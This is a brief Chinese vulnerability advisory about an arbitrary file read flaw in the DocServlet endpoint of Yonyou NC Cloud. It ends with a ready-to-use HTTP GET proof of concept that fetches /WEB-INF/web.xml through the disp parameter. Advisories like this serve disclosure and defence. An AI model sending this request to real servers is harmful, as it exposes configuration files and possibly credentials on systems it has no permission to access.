用友NC DocServlet 接口存在任意文件读取漏洞

日期: 2023-11-21 | 影响软件: 用友NC | POC: 已公开

NC Cloud是一款大型企业数字化平台，聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现人、财、物、客的全面数字化，其nc.uap.lfw.file.action.DocServlet 存在任意文件读取漏洞

GET /servlet/~webrt/nc.uap.lfw.file.action.DocServlet?disp=/WEB-INF/web.xml HTTP/1.1